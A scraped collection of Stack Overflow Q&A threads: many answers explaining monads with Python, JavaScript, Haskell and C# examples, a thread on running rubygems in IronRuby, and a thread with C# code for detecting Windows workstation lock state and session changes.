A: Another attempt at explaining monads, using just Python lists and the map function. I fully accept this isn't a full explanation, but I hope it gets at the core concepts.
I got the basis of this from the funfunfunction video on Monads and the Learn You A Haskell chapter 'For a Few Monads More'. I highly recommend watching the funfunfunction video.
At its very simplest, Monads are objects that have map and flatMap functions (bind in Haskell). There are some extra required properties, but these are the core ones.
flatMap 'flattens' the output of map; for lists this just concatenates the contained lists, e.g.
concat([[1], [4], [9]]) = [1, 4, 9]
So in Python we can very basically implement a Monad with just these two functions:
def flatMap(func, lst):
return concat(map(func, lst))
def concat(lst):
return sum(lst, [])
func is any function that takes a value and returns a list e.g.
lambda x: [x*x]
Explanation
For clarity I created the concat function in Python via a simple function, which sums the lists i.e. [] + [1] + [4] + [9] = [1, 4, 9] (Haskell has a native concat method).
I'm assuming you know what the map function is e.g.:
>>> list(map(lambda x: [x*x], [1,2,3]))
[[1], [4], [9]]
Flattening is the key concept of Monads and for each object which is a Monad this flattening allows you to get at the value that is wrapped in the Monad.
Now we can call:
>>> flatMap(lambda x: [x*x], [1,2,3])
[1, 4, 9]
This lambda is taking a value x and putting it into a list. A monad works with any function that goes from a value to a type of the monad, so a list in this case.
That's your monad defined.
I think the question of why they're useful has been answered in other questions.
More explanation
Other examples that aren't lists are JavaScript Promises, which have the then method and JavaScript Streams which have a flatMap method.
So Promises and Streams use a slightly different function which flattens out a Stream or a Promise and returns the value from within.
The Haskell list monad has the following definition:
instance Monad [] where
return x = [x]
xs >>= f = concat (map f xs)
fail _ = []
i.e. there are three functions return (not to be confused with return in most other languages), >>= (the flatMap) and fail.
Hopefully you can see the similarity between:
xs >>= f = concat (map f xs)
and:
def flatMap(f, xs):
return concat(map(f, xs))
A: But, You could have invented Monads!
sigfpe says:
But all of these introduce monads as something esoteric in need of explanation. But what I want to argue is that they aren't esoteric at all. In fact, faced with various problems in functional programming you would have been led, inexorably, to certain solutions, all of which are examples of monads. In fact, I hope to get you to invent them now if you haven't already. It's then a small step to notice that all of these solutions are in fact the same solution in disguise. And after reading this, you might be in a better position to understand other documents on monads because you'll recognise everything you see as something you've already invented.
Many of the problems that monads try to solve are related to the issue of side effects. So we'll start with them. (Note that monads let you do more than handle side-effects, in particular many types of container object can be viewed as monads. Some of the introductions to monads find it hard to reconcile these two different uses of monads and concentrate on just one or the other.)
In an imperative programming language such as C++, functions behave nothing like the functions of mathematics. For example, suppose we have a C++ function that takes a single floating point argument and returns a floating point result. Superficially it might seem a little like a mathematical function mapping reals to reals, but a C++ function can do more than just return a number that depends on its arguments. It can read and write the values of global variables as well as writing output to the screen and receiving input from the user. In a pure functional language, however, a function can only read what is supplied to it in its arguments and the only way it can have an effect on the world is through the values it returns.
A: My favorite Monad tutorial:
http://www.haskell.org/haskellwiki/All_About_Monads
(out of 170,000 hits on a Google search for "monad tutorial"!)
@Stu: The point of monads is to allow you to add (usually) sequential semantics to otherwise pure code; you can even compose monads (using Monad Transformers) and get more interesting and complicated combined semantics, like parsing with error handling, shared state, and logging, for example. All of this is possible in pure code, monads just allow you to abstract it away and reuse it in modular libraries (always good in programming), as well as providing convenient syntax to make it look imperative.
Haskell already has operator overloading[1]: it uses type classes much the way one might use interfaces in Java or C# but Haskell just happens to also allow non-alphanumeric tokens like + && and > as infix identifiers. It's only operator overloading in your way of looking at it if you mean "overloading the semicolon" [2]. It sounds like black magic and asking for trouble to "overload the semicolon" (picture enterprising Perl hackers getting wind of this idea) but the point is that without monads there is no semicolon, since purely functional code does not require or allow explicit sequencing.
This all sounds much more complicated than it needs to. sigfpe's article is pretty cool but uses Haskell to explain it, which sort of fails to break the chicken and egg problem of understanding Haskell to grok Monads and understanding Monads to grok Haskell.
[1] This is a separate issue from monads but monads use Haskell's operator overloading feature.
[2] This is also an oversimplification since the operator for chaining monadic actions is >>= (pronounced "bind") but there is syntactic sugar ("do") that lets you use braces and semicolons and/or indentation and newlines.
A: First: The term monad is a bit vacuous if you are not a mathematician. An alternative term is computation builder which is a bit more descriptive of what they are actually useful for.
They are a pattern for chaining operations. It looks a bit like method chaining in object-oriented languages, but the mechanism is slightly different.
The pattern is mostly used in functional languages (especially Haskell which uses monads pervasively) but can be used in any language which support higher-order functions (that is, functions which can take other functions as arguments).
Arrays in JavaScript support the pattern, so let’s use that as the first example.
The gist of the pattern is we have a type (Array in this case) which has a method which takes a function as argument. The operation supplied must return an instance of the same type (i.e. return an Array).
First an example of method chaining which does not use the monad pattern:
[1,2,3].map(x => x + 1)
The result is [2,3,4]. The code does not conform to the monad pattern, since the function we are supplying as an argument returns a number, not an Array. The same logic in monad form would be:
[1,2,3].flatMap(x => [x + 1])
Here we supply an operation which returns an Array, so now it conforms to the pattern. The flatMap method executes the provided function for every element in the array. It expects an array as result for each invocation (rather than single values), but merges the resulting set of arrays into a single array. So the end result is the same, the array [2,3,4].
(The function argument provided to a method like map or flatMap is often called a "callback" in JavaScript. I will call it the "operation" since it is more general.)
If we chain multiple operations (in the traditional way):
[1,2,3].map(a => a + 1).filter(b => b != 3)
Results in the array [2,4]
The same chaining in monad form:
[1,2,3].flatMap(a => [a + 1]).flatMap(b => b != 3 ? [b] : [])
Yields the same result, the array [2,4].
You will immediately notice that the monad form is quite a bit uglier than the non-monad! This just goes to show that monads are not necessarily “good”. They are a pattern which is sometimes beneficial and sometimes not.
Do note that the monad pattern can be combined in a different way:
[1,2,3].flatMap(a => [a + 1].flatMap(b => b != 3 ? [b] : []))
Here the binding is nested rather than chained, but the result is the same. This is an important property of monads as we will see later. It means two operations combined can be treated the same as a single operation.
The operation is allowed to return an array with different element types, for example transforming an array of numbers into an array of strings or something else; as long as it is still an Array.
This can be described a bit more formally using Typescript notation. An array has the type Array<T>, where T is the type of the elements in the array. The method flatMap() takes a function argument of the type T => Array<U> and returns an Array<U>.
Generalized, a monad is any type Foo<Bar> which has a "bind" method which takes a function argument of type Bar => Foo<Baz> and returns a Foo<Baz>.
This answers what monads are. The rest of this answer will try to explain through examples why monads can be a useful pattern in a language like Haskell which has good support for them.
Haskell and Do-notation
To translate the map/filter example directly to Haskell, we replace flatMap with the >>= operator:
[1,2,3] >>= \a -> [a+1] >>= \b -> if b == 3 then [] else [b]
The >>= operator is the bind function in Haskell. It does the same as flatMap in JavaScript when the operand is a list, but it is overloaded with different meaning for other types.
But Haskell also has a dedicated syntax for monad expressions, the do-block, which hides the bind operator altogether:
do
a <- [1,2,3]
b <- [a+1]
if b == 3 then [] else [b]
This hides the "plumbing" and lets you focus on the actual operations applied at each step.
In a do-block, each line is an operation. The constraint still holds that all operations in the block must return the same type. Since the first expression is a list, the other operations must also return a list.
The back-arrow <- looks deceptively like an assignment, but note that this is the parameter passed in the bind. So, when the expression on the right side is a List of Integers, the variable on the left side will be a single Integer – but will be executed for each integer in the list.
Example: Safe navigation (the Maybe type)
Enough about lists, lets see how the monad pattern can be useful for other types.
Some functions may not always return a valid value. In Haskell this is represented by the Maybe-type, which is an option that is either Just value or Nothing.
Chaining operations which always return a valid value is of course straightforward:
streetName = getStreetName (getAddress (getUser 17))
But what if any of the functions could return Nothing? We need to check each result individually and only pass the value to the next function if it is not Nothing:
case getUser 17 of
Nothing -> Nothing
Just user ->
case getAddress user of
Nothing -> Nothing
Just address ->
getStreetName address
Quite a lot of repetitive checks! Imagine if the chain was longer. Haskell solves this with the monad pattern for Maybe:
do
user <- getUser 17
addr <- getAddress user
getStreetName addr
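Desugared, that block is just nested binds (a sketch, using the same hypothetical functions):
getUser 17 >>= \user ->
  getAddress user >>= \addr ->
    getStreetName addr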
This do-block invokes the bind-function for the Maybe type (since the result of the first expression is a Maybe). The bind-function only executes the following operation if the value is Just value, otherwise it just passes the Nothing along.
Here the monad-pattern is used to avoid repetitive code. This is similar to how some other languages use macros to simplify syntax, although macros achieve the same goal in a very different way.
Note that it is the combination of the monad pattern and the monad-friendly syntax in Haskell which result in the cleaner code. In a language like JavaScript without any special syntax support for monads, I doubt the monad pattern would be able to simplify the code in this case.
Mutable state
Haskell does not support mutable state. All variables are constants and all values immutable. But the State type can be used to emulate programming with mutable state:
add2 :: State Integer Integer
add2 = do
-- add 1 to state
x <- get
put (x + 1)
-- increment in another way
modify (+1)
-- return state
get
evalState add2 7
=> 9
The add2 function builds a monad chain which is then evaluated with 7 as the initial state.
Obviously this is something which only makes sense in Haskell. Other languages support mutable state out of the box. Haskell is generally "opt-in" on language features - you enable mutable state when you need it, and the type system ensures the effect is explicit. IO is another example of this.
IO
The IO type is used for chaining and executing “impure” functions.
Like any other practical language, Haskell has a bunch of built-in functions which interface with the outside world: putStrLn, getLine and so on. These functions are called “impure” because they either cause side effects or have non-deterministic results. Even something simple like getting the time is considered impure because the result is non-deterministic – calling it twice with the same arguments may return different values.
A pure function is deterministic – its result depends purely on the arguments passed and it has no side effects on the environment beside returning a value.
Haskell heavily encourages the use of pure functions – this is a major selling point of the language. Unfortunately for purists, you need some impure functions to do anything useful. The Haskell compromise is to cleanly separate pure and impure, and guarantee that there is no way that pure functions can execute impure functions, directly or indirectly.
This is guaranteed by giving all impure functions the IO type. The entry point of a Haskell program is the main function, which has the IO type, so we can execute impure functions at the top level.
But how does the language prevent pure functions from executing impure functions? This is due to the lazy nature of Haskell. A function is only executed if its output is consumed by some other function. But there is no way to consume an IO value except to assign it to main. So if a function wants to execute an impure function, it has to be connected to main and have the IO type.
Using monad chaining for IO operations also ensures that they are executed in a linear and predictable order, just like statements in an imperative language.
This brings us to the first program most people will write in Haskell:
main :: IO ()
main = do
putStrLn "Hello World"
The do keyword is superfluous when there is only a single operation and therefore nothing to bind, but I keep it anyway for consistency.
The () type means “void”. This special return type is only useful for IO functions called for their side effect.
A longer example:
main = do
putStrLn "What is your name?"
name <- getLine
putStrLn ("hello" ++ name)
This builds a chain of IO operations, and since they are assigned to the main function, they get executed.
Comparing IO with Maybe shows the versatility of the monad pattern. For Maybe, the pattern is used to avoid repetitive code by moving conditional logic to the binding function. For IO, the pattern is used to ensure that all operations of the IO type are sequenced and that IO operations cannot "leak" to pure functions.
Summing up
In my subjective opinion, the monad pattern is only really worthwhile in a language which has some built-in support for the pattern. Otherwise it just leads to overly convoluted code. But Haskell (and some other languages) have some built-in support which hides the tedious parts, and then the pattern can be used for a variety of useful things. Like:
*
*Avoiding repetitive code (Maybe)
*Adding language features like mutable state or exceptions for delimited areas of the program.
*Isolating icky stuff from nice stuff (IO)
*Embedded domain-specific languages (Parser)
*Adding GOTO to the language.
A: I am still new to monads, but I thought I would share a link I found that felt really good to read (WITH PICTURES!!):
http://www.matusiak.eu/numerodix/blog/2012/3/11/monads-for-the-layman/
(no affiliation)
Basically, the warm and fuzzy concept that I got from the article was that monads are basically adapters that allow disparate functions to work in a composable fashion, i.e. to string together multiple functions and mix and match them without worrying about inconsistent return types and such. So the BIND function is in charge of keeping apples with apples and oranges with oranges when we're trying to make these adapters. And the LIFT function is in charge of taking "lower level" functions and "upgrading" them to work with BIND functions and be composable as well.
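For instance, in Haskell liftM performs exactly this kind of upgrade. A minimal sketch (shout is an illustrative function, not from the article):
import Control.Monad (liftM)

shout :: String -> String
shout s = s ++ "!"

-- Upgrade the ordinary function so it works on wrapped values, here Maybe:
upgraded :: Maybe String
upgraded = liftM shout (Just "hello")   -- Just "hello!"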
I hope I got it right, and more importantly, hope that the article has a valid view on monads. If nothing else, this article helped whet my appetite for learning more about monads.
A: http://mikehadlow.blogspot.com/2011/02/monads-in-c-8-video-of-my-ddd9-monad.html
This is the video you are looking for.
Demonstrating in C# what the problem is with composition and aligning the types, and then implementing them properly in C#.
Towards the end he displays how the same C# code looks in F# and finally in Haskell.
A: Mathematical thinking
In short: an Algebraic Structure for Combining Computations.
return data: creates a computation that simply generates a value in the monad world.
(return data) >>= (return func): the second parameter accepts the first parameter as a data generator and creates a new computation that concatenates them.
You can think of (>>=) and return as doing no computation themselves; they simply combine and create computations.
Any monadic computation is computed if and only if main triggers it.
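A tiny Haskell sketch of that last point - combining is separate from triggering:
-- plan is built by combining with return and >>=, but nothing runs
-- until main triggers it:
plan :: IO ()
plan = return 2 >>= \x -> print (x * 2)

main :: IO ()
main = plan   -- prints 4 here, and only here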
A: In the Coursera "Principles of Reactive Programming" course, Erik Meijer describes them as:
"Monads are return types that guide you through the happy path." -Erik Meijer
A: According to What we talk about when we talk about monads the question "What is a monad" is wrong:
The short answer to the question "What is a monad?" is that it is a monoid in the category of endofunctors or that it is a generic data type equipped with two operations that satisfy certain laws. This is correct, but it does not reveal an important bigger picture. This is because the question is wrong. In this paper, we aim to answer the right question, which is "What do authors really say when they talk about monads?"
While that paper does not directly answer what a monad is it helps understanding what people with different backgrounds mean when they talk about monads and why.
A: If you are asking for a succinct, practical explanation for something so abstract, then you can only hope for an abstract answer:
a -> b
is one way of representing a computation from as to bs. You can chain computations, aka compose them together:
(b -> c) -> (a -> b) -> (a -> c)
More complex computations demand more complex types, e.g.:
a -> f b
is the type of computations from as to bs that are into fs. You can also compose them:
(b -> f c) -> (a -> f b) -> (a -> f c)
It turns out this pattern appears literally everywhere and has the same properties as the first composition above (associativity, right- and left-identity).
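In Haskell this second kind of composition is spelled >=> (the Kleisli arrow from Control.Monad, with its arguments in left-to-right order). A sketch with illustrative functions:
import Control.Monad ((>=>))

safeRecip :: Double -> Maybe Double
safeRecip 0 = Nothing
safeRecip x = Just (1 / x)

safeSqrt :: Double -> Maybe Double
safeSqrt x = if x < 0 then Nothing else Just (sqrt x)

-- compose two fallible computations into one:
recipThenSqrt :: Double -> Maybe Double
recipThenSqrt = safeRecip >=> safeSqrt   -- recipThenSqrt 4 == Just 0.5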
One had to give this pattern a name, but then would it help to know that the first composition is formally characterised as a Semigroupoid?
"Monads are just as interesting and important as parentheses" (Oleg Kiselyov)
A: A Monad is a box with a special machine attached that allows you to make one normal box out of two nested boxes - but still retaining some of the shape of both boxes.
Concretely, it allows you to perform join, of type Monad m => m (m a) -> m a.
It also needs a return action, which just wraps a value. return :: Monad m => a -> m a
You could also say join unboxes and return wraps - but join is not of type Monad m => m a -> a (It doesn't unwrap all Monads, it unwraps Monads with Monads inside of them.)
So it takes a Monad box (Monad m =>, m) with a box inside it ((m a)) and makes a normal box (m a).
However, usually a Monad is used in terms of the (>>=) (spoken "bind") operator, which is essentially just fmap and join after each other. Concretely,
x >>= f = join (fmap f x)
(>>=) :: Monad m => (a -> m b) -> m a -> m b
Note here that the function comes in the second argument, as opposed to fmap.
Also, join = (>>= id).
Now why is this useful? Essentially, it allows you to make programs that string together actions, while working in some sort of framework (the Monad).
The most prominent use of Monads in Haskell is the IO Monad.
Now, IO is the type that classifies an Action in Haskell. Here, the Monad system was the only way of preserving (big fancy words):
*
*Referential Transparency
*Laziness
*Purity
In essence, an IO action such as getLine :: IO String can't be replaced by a String, as it always has a different type. Think of IO as a sort of magical box that teleports the stuff to you.
However, still just saying that getLine :: IO String and all functions accept IO a causes mayhem as maybe the functions won't be needed. What would const "üp§" getLine do? (const discards the second argument. const a b = a.) The getLine doesn't need to be evaluated, but it's supposed to do IO! This makes the behaviour rather unpredictable - and also makes the type system less "pure", as all functions would take a and IO a values.
Enter the IO Monad.
To string to actions together, you just flatten the nested actions.
And to apply a function to the output of the IO action, the a in the IO a type, you just use (>>=).
As an example, to output an entered line (to output a line is a function which produces an IO action, matching the right argument of >>=):
getLine >>= putStrLn :: IO ()
-- putStrLn :: String -> IO ()
This can be written more intuitively with the do environment:
do line <- getLine
putStrLn line
In essence, a do block like this:
do x <- a
y <- b
z <- f x y
w <- g z
h x
k <- h z
l k w
... gets transformed into this:
a >>= \x ->
b >>= \y ->
f x y >>= \z ->
g z >>= \w ->
h x >>= \_ ->
h z >>= \k ->
l k w
There's also the >> operator for m >>= \_ -> f (when the value in the box isn't needed to make the new box in the box)
It can also be written a >> b = a >>= const b (const a b = a)
Also, the return operator is modeled after the IO intuition - it returns a value with minimal context, in this case no IO. Since the a in IO a represents the returned type, this is similar to something like return(a) in imperative programming languages - but it does not stop the chain of actions! f >>= return >>= g is the same as f >>= g. It's only useful when the term you return has been created earlier in the chain - see above.
Of course, there are other Monads, otherwise it wouldn't be called Monad, it'd be called something like "IO Control".
For example, the List Monad (Monad []) flattens by concatenating - making the (>>=) operator perform a function on all elements of a list. This can be seen as "indeterminism", where the List is the many possible values and the Monad Framework is making all the possible combinations.
For example (in GHCi):
Prelude> [1, 2, 3] >>= replicate 3 -- Simple binding
[1, 1, 1, 2, 2, 2, 3, 3, 3]
Prelude> concat (map (replicate 3) [1, 2, 3]) -- Same operation, more explicit
[1, 1, 1, 2, 2, 2, 3, 3, 3]
Prelude> [1, 2, 3] >> "uq"
"uququq"
Prelude> return 2 :: [Int]
[2]
Prelude> join [[1, 2], [3, 4]]
[1, 2, 3, 4]
because:
join a = concat a
a >>= f = join (fmap f a)
return a = [a] -- or "= (:[])"
The Maybe Monad just nullifies all results to Nothing if that ever occurs.
That is, in a >>= f, binding auto-checks whether the value a is Nothing or the function f returns Nothing - and in either case yields Nothing as well.
join Nothing = Nothing
join (Just Nothing) = Nothing
join (Just x) = x
a >>= f = join (fmap f a)
or, more explicitly:
Nothing >>= _ = Nothing
(Just x) >>= f = f x
The State Monad is for functions that also modify some shared state - s -> (a, s), so the argument of >>= is :: a -> s -> (a, s).
The name is a sort of misnomer, since State really is for state-modifying functions, not for the state - the state itself really has no interesting properties, it just gets changed.
For example:
pop :: [a] -> (a , [a])
pop (h:t) = (h, t)
sPop = state pop -- The module for State exports no State constructor,
-- only a state function
push :: a -> [a] -> ((), [a])
push x l = ((), x : l)
sPush = state push
swap = do a <- sPop
b <- sPop
sPush a
sPush b
get2 = do a <- sPop
b <- sPop
return (a, b)
getswapped = do swap
get2
then:
*Main> runState swap [1, 2, 3]
((), [2, 1, 3])
*Main> runState get2 [1, 2, 3]
((1, 2), [3])
*Main> runState (swap >> get2) [1, 2, 3]
((2, 1), [3])
*Main> runState getswapped [1, 2, 3]
((2, 1), [3])
also:
Prelude> runState (return 0) 1
(0, 1)
A: For people coming from an imperative background (C# specifically),
consider the following code:
bool ReturnTrueorFalse(SomeObject input)
{
if(input.Property1 is invalid)
{
return false;
}
if(input.Property2 is invalid)
{
return false;
}
DoSomething();
return true;
}
You will have seen lots of code like this; you may even have seen versions with no early returns, where all the checks are nested. Now, Monad is a pattern where this can be flattened like below:
Monad<bool> ReturnTrueorFalse(SomeObject input) =>
from isProperty1Valid in input.Property1
from isProperty2Valid in input.Property2
select Monad.Create(isProperty1Valid && isProperty2Valid);
There are a few things to note here. First, the function's return value is changed. Second, both the properties of input have to be Monad. Next, Monad should implement SelectMany(LINQ's flattening operator). Since SelectMany is implemented for that type, the statements can be written using the query syntax
So, what is a Monad? It is a structure that flattens expressions that return the same type in a composable way. This is particularly useful in functional programming because most functional applications tend to keep the state and IO at the edge layer of the application (eg: Controllers) and return Monad based return values throughout the call stack until the value is required to be unwrapped. The biggest plus for me when I first saw this was it was so easy on the eyes as it was so declarative.
The best example of a Monad that every C# (these days almost everyone) developer can immediately recognize is async/await. Before .NET 4.5 we had to write Task-based statements using ContinueWith for handling callbacks; after async/await we started using synchronous-looking syntax for asynchronous code. This is possible because Task is a "monad".
Refer to this for a detailed explanation, this for simple implementation and language-ext for lots of awesome Monads and tons of information about functional programming in general for an OOP developer
A: Explanation
It's quite simple, when explained in C#/Java terms:
*
*A monad is a function that takes arguments and returns a special type.
*The special type that this monad returns is also called monad. (A monad is a combination of #1 and #2)
*There's some syntactic sugar to make calling this function and conversion of types easier.
Example
A monad is useful to make the life of the functional programmer easier. The typical example: The Maybe monad takes two parameters, a value and a function. It returns null if the passed value is null. Otherwise it evaluates the function. If we needed a special return type, we would call this return type Maybe as well. A very crude implementation would look like this:
object Maybe(object value, Func<object,object> function)
{
if(value==null)
return null;
return function(value);
}
This is spectacularly useless in C# because this language lacks the required syntactic sugar to make monads useful. But monads allow you to write more concise code in functional programming languages.
Oftentimes programmers call monads in chains, like so:
var x = Maybe(x, x2 => Maybe(y, y2 => Add(x2, y2)));
In this example the Add method would only be called if x and y are both non-null, otherwise null will be returned.
Answer
To answer the original question: A monad is a function AND a type. Like an implementation of a special interface.
A: Following your brief, succinct, practical indications:
The easiest way to understand a monad is as a way to apply/compose functions within a context. Let's say you have two computations which both can be seen as two mathematical functions f and g.
*
*f takes a String and produces another String (take the first two letters)
*g takes a String and produces another String (upper case transformation)
So in any language the transformation "take the first two letters and convert them to upper case" would be written g(f("some string")). So, in the world of pure perfect functions, composition is just: do one thing and then do the other.
But let's say we live in the world of functions which can fail. For example: the input string might be one char long so f would fail. So in this case
*
*f takes a String and produces a String or Nothing.
*g produces a String only if f hasn't failed. Otherwise, produces Nothing
So now, g(f("some string")) needs some extra checking: "Compute f, if it fails then g should return Nothing, else compute g"
This idea can be applied to any parametrized type as follows:
Let Context[Sometype] be a computation of Sometype within a Context. Considering functions
*
*f:: AnyType -> Context[Sometype]
*g:: Sometype -> Context[AnyOtherType]
the composition g(f()) should be read as "compute f. Within this context do some extra computations and then compute g if it makes sense within the context"
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44965",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1660"
} |
Q: Can I run rubygems in ironruby? Is it currently possible with a pre-release of IronRuby to run rubygems? It seems as if I have to set an environment variable to find them?
A: You've been able to run rubygems under IronRuby for quite a while now. Simply download and install the latest IronRuby from codeplex, and run igem on the command line
Original Answer:
I'm on that mailing list - to save you the digging, someone asked this a few weeks ago, and this was the answer
The answer (at this point) is no, you can't, but it doesn't seem like it'll be too far away.
PS: listen to curt. He's on the core team for ironruby. <3
A: if you set ENV['GEM_PATH'] correctly before using rubygems, then gems will work sometimes under IronRuby. I'm actually looking at fixing this right now.
Also, this kind of question is probably better suited for the IronRuby mailing list than it is for StackOverflow.
A: With IronRuby 1.0 Alpha 2 you should be able to get igem.bat out of the box. According to Jim Deville on Nov 19 2008:
Announcing the release of IronRuby 1.0 Alpha 2. You can download it on RubyForge (http://rubyforge.org/frs/?group_id=4359), I will have a tag in SVN soon. Notable features: the inclusion of iirb.bat, igem.bat, irails.bat, irake.bat! This is our first standalone release. Two caveats: If you want caller to work correctly, use -X:Interpret. If you want Rubygems to work, ensure that all of your sources end with a /. You can check in ~/.gemrc
Since then, there's an official site with daily builds. You can find it at http://www.ironruby.net/Download
After that,
Set GEM_PATH to your \lib\ruby\gems\1.8 directory, e.g. c:\ruby\lib\ruby\gems\1.8
c:\> set GEM_PATH=c:\ruby\lib\ruby\gems\1.8
Test with
c:\> igem.bat
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44973",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Programmatically Determine a Duration of a Locked Workstation? How can one determine, in code, how long the machine is locked?
Other ideas outside of C# are also welcome.
I like the windows service idea (and have accepted it) for simplicity and cleanliness, but unfortunately I don't think it will work for me in this particular case. I wanted to run this on my workstation at work rather than home (or in addition to home, I suppose), but it's locked down pretty hard courtesy of the DoD. That's part of the reason I'm rolling my own, actually.
I'll write it up anyway and see if it works. Thanks everyone!
A: I know this is an old question but I have found a method to get the Lock State for a given session.
I found my answer here but it was in C++ so I translated as much as I could to C# to get the Lock State.
So here goes:
static class SessionInfo {
private const Int32 FALSE = 0;
private static readonly IntPtr WTS_CURRENT_SERVER = IntPtr.Zero;
private const Int32 WTS_SESSIONSTATE_LOCK = 0;
private const Int32 WTS_SESSIONSTATE_UNLOCK = 1;
private static bool _is_win7 = false;
static SessionInfo() {
var os_version = Environment.OSVersion;
_is_win7 = (os_version.Platform == PlatformID.Win32NT && os_version.Version.Major == 6 && os_version.Version.Minor == 1);
}
[DllImport("wtsapi32.dll")]
private static extern Int32 WTSQuerySessionInformation(
IntPtr hServer,
[MarshalAs(UnmanagedType.U4)] UInt32 SessionId,
[MarshalAs(UnmanagedType.U4)] WTS_INFO_CLASS WTSInfoClass,
out IntPtr ppBuffer,
[MarshalAs(UnmanagedType.U4)] out UInt32 pBytesReturned
);
[DllImport("wtsapi32.dll")]
private static extern void WTSFreeMemoryEx(
WTS_TYPE_CLASS WTSTypeClass,
IntPtr pMemory,
UInt32 NumberOfEntries
);
private enum WTS_INFO_CLASS {
WTSInitialProgram = 0,
WTSApplicationName = 1,
WTSWorkingDirectory = 2,
WTSOEMId = 3,
WTSSessionId = 4,
WTSUserName = 5,
WTSWinStationName = 6,
WTSDomainName = 7,
WTSConnectState = 8,
WTSClientBuildNumber = 9,
WTSClientName = 10,
WTSClientDirectory = 11,
WTSClientProductId = 12,
WTSClientHardwareId = 13,
WTSClientAddress = 14,
WTSClientDisplay = 15,
WTSClientProtocolType = 16,
WTSIdleTime = 17,
WTSLogonTime = 18,
WTSIncomingBytes = 19,
WTSOutgoingBytes = 20,
WTSIncomingFrames = 21,
WTSOutgoingFrames = 22,
WTSClientInfo = 23,
WTSSessionInfo = 24,
WTSSessionInfoEx = 25,
WTSConfigInfo = 26,
WTSValidationInfo = 27,
WTSSessionAddressV4 = 28,
WTSIsRemoteSession = 29
}
private enum WTS_TYPE_CLASS {
WTSTypeProcessInfoLevel0,
WTSTypeProcessInfoLevel1,
WTSTypeSessionInfoLevel1
}
public enum WTS_CONNECTSTATE_CLASS {
WTSActive,
WTSConnected,
WTSConnectQuery,
WTSShadow,
WTSDisconnected,
WTSIdle,
WTSListen,
WTSReset,
WTSDown,
WTSInit
}
public enum LockState {
Unknown,
Locked,
Unlocked
}
[StructLayout(LayoutKind.Sequential)]
private struct WTSINFOEX {
public UInt32 Level;
public UInt32 Reserved; /* I have observed the Data field is pushed down by 4 bytes so I have added this field as padding. */
public WTSINFOEX_LEVEL Data;
}
[StructLayout(LayoutKind.Sequential)]
private struct WTSINFOEX_LEVEL {
public WTSINFOEX_LEVEL1 WTSInfoExLevel1;
}
[StructLayout(LayoutKind.Sequential)]
private struct WTSINFOEX_LEVEL1 {
public UInt32 SessionId;
public WTS_CONNECTSTATE_CLASS SessionState;
public Int32 SessionFlags;
/* I can't figure out what the rest of the struct should look like but as I don't need anything past the SessionFlags, I'm not going to. */
}
public static LockState GetSessionLockState(UInt32 session_id) {
IntPtr ppBuffer;
UInt32 pBytesReturned;
Int32 result = WTSQuerySessionInformation(
WTS_CURRENT_SERVER,
session_id,
WTS_INFO_CLASS.WTSSessionInfoEx,
out ppBuffer,
out pBytesReturned
);
if (result == FALSE)
return LockState.Unknown;
var session_info_ex = Marshal.PtrToStructure<WTSINFOEX>(ppBuffer);
if (session_info_ex.Level != 1)
return LockState.Unknown;
var lock_state = session_info_ex.Data.WTSInfoExLevel1.SessionFlags;
WTSFreeMemoryEx(WTS_TYPE_CLASS.WTSTypeSessionInfoLevel1, ppBuffer, pBytesReturned);
if (_is_win7) {
/* Ref: https://msdn.microsoft.com/en-us/library/windows/desktop/ee621019(v=vs.85).aspx
* Windows Server 2008 R2 and Windows 7: Due to a code defect, the usage of the WTS_SESSIONSTATE_LOCK
* and WTS_SESSIONSTATE_UNLOCK flags is reversed. That is, WTS_SESSIONSTATE_LOCK indicates that the
* session is unlocked, and WTS_SESSIONSTATE_UNLOCK indicates the session is locked.
* */
switch (lock_state) {
case WTS_SESSIONSTATE_LOCK:
return LockState.Unlocked;
case WTS_SESSIONSTATE_UNLOCK:
return LockState.Locked;
default:
return LockState.Unknown;
}
}
else {
switch (lock_state) {
case WTS_SESSIONSTATE_LOCK:
return LockState.Locked;
case WTS_SESSIONSTATE_UNLOCK:
return LockState.Unlocked;
default:
return LockState.Unknown;
}
}
}
}
Note: The above code was extracted from a much larger project so if I missed a bit, sorry. I haven't had time to test the above code but plan to come back in a week or two to check everything. I only posted it now because I didn't want to forget to do it.
A: NOTE: This is not an answer, but a contribution to Timothy Carter's answer, because my reputation doesn't yet allow me to comment.
Just in case somebody tried the code from Timothy Carter's answer and did not get it to work right away in a Windows service, there's one property that needs to be set to true in the constructor of the service.
Just add the line in the constructor:
CanHandleSessionChangeEvent = true;
And be sure not to set this property after the service is started otherwise an InvalidOperationException will be thrown.
A: If you're interested in writing a windows-service to "find" these events, topshelf (the library/framework that makes writing windows services much easier) has a hook.
public interface IMyServiceContract
{
void Start();
void Stop();
void SessionChanged(Topshelf.SessionChangedArguments args);
}
public class MyService : IMyServiceContract
{
public void Start()
{
}
public void Stop()
{
}
public void SessionChanged(SessionChangedArguments e)
{
Console.WriteLine(e.ReasonCode);
}
}
and now the code to wire up the topshelf service to the interface/concrete above
Everything below is "typical" topshelf setup.... except for 2 lines which I marked as
/* THIS IS MAGIC LINE */
Those are what get the SessionChanged method to fire.
I tested this with windows 10 x64. I locked and unlocked my machine and I got the desired result.
IMyServiceContract myServiceObject = new MyService(); /* container.Resolve<IMyServiceContract>(); */
HostFactory.Run(x =>
{
x.Service<IMyServiceContract>(s =>
{
s.ConstructUsing(name => myServiceObject);
s.WhenStarted(sw => sw.Start());
s.WhenStopped(sw => sw.Stop());
s.WhenSessionChanged((csm, hc, chg) => csm.SessionChanged(chg)); /* THIS IS MAGIC LINE */
});
x.EnableSessionChanged(); /* THIS IS MAGIC LINE */
/* use command line variables for the below commented out properties */
/*
x.RunAsLocalService();
x.SetDescription("My Description");
x.SetDisplayName("My Display Name");
x.SetServiceName("My Service Name");
x.SetInstanceName("My Instance");
*/
x.StartManually(); // Start the service manually. This allows the identity to be tweaked before the service actually starts
/* the below map to the "Recover" tab on the properties of the Windows Service in Control Panel */
x.EnableServiceRecovery(r =>
{
r.OnCrashOnly();
r.RestartService(1); ////first
r.RestartService(1); ////second
r.RestartService(1); ////subsequents
r.SetResetPeriod(0);
});
x.DependsOnEventLog(); // Windows Event Log
x.UseLog4Net();
x.EnableShutdown();
x.OnException(ex =>
{
/* Log the exception */
/* not seen, I have a log4net logger here */
});
});
My packages.config to provide hints about versions:
